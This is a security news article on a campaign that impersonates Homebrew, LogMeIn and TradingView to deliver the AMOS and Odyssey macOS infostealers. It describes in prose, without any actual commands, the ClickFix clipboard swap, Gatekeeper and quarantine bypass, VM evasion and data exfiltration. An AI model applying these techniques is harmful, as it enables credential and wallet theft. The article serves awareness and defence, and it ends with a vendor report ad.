Secure Your Homebrew with LogMeIn: Protect Your Information from Infostealers

New Malicious Campaign Targeting macOS Developers

A recent malicious campaign has been identified targeting macOS developers with fake Homebrew, LogMeIn, and TradingView platforms. These platforms are used to deliver infostealing malware such as AMOS (Atomic macOS Stealer) and Odyssey.

The campaign utilizes a technique known as “ClickFix,” where targets are deceived into executing commands in Terminal, leading to their systems being infected with malware.

Homebrew, a popular open-source package management system for macOS and Linux, has been exploited by threat actors in the past to distribute AMOS through malvertising campaigns.

LogMeIn, a remote access service, and TradingView, a financial charting and market analysis platform, are widely used by Apple users and have also been impersonated in this campaign.

Domains Impersonating Legitimate Platforms

Upon investigation, it was found that some of these malicious domains were boosted through Google Ads, indicating that the threat actor used this method to increase visibility in Google search results.

The fraudulent sites feature convincing download portals for the fake apps and instruct users to execute a curl command in Terminal to install them, according to researchers.

In the case of TradingView, the malicious commands are presented as a “connection security confirmation step.” However, clicking the ‘copy’ button delivers a base64-encoded installation command to the clipboard instead of the displayed Cloudflare verification ID.

The commands obtained from these sites fetch and decode an ‘install.sh’ file, which downloads a payload binary that bypasses Gatekeeper prompts and removes quarantine flags to allow execution.

The payload, either AMOS or Odyssey, is then executed on the host machine after verifying the environment to ensure it is not a virtual machine or an analysis system.

The malware makes use of sudo to run commands as root and initiates by gathering detailed hardware and memory information from the host.

Subsequently, it manipulates system services, interacts with macOS XPC services, and blends its malicious activity with legitimate processes to avoid detection.

The infostealing components of the malware are activated, collecting sensitive information from browsers, cryptocurrency credentials, and other data, which is then exfiltrated to a command and control (C2) server.

About the Malware: AMOS and Odyssey

AMOS, discovered in April 2023, is a malware-as-a-service (MaaS) available for a $1,000/month subscription. It is capable of stealing a wide range of data from infected hosts and now includes a backdoor component for remote persistent access.

Odyssey Stealer, a new family derived from Poseidon Stealer, which has roots in AMOS, targets credentials and cookies stored in browsers, cryptocurrency wallet extensions, Keychain data, and personal files. This information is then sent to attackers in ZIP format.

Users are strongly advised against executing Terminal commands found online if they do not fully understand their implications to prevent falling victim to such malware campaigns.

46% of environments had passwords cracked, nearly doubling from 25% last year.

Get the Picus Blue Report 2025 now for a comprehensive look at more findings on prevention, detection, and data exfiltration trends.

Get the Blue Report 2025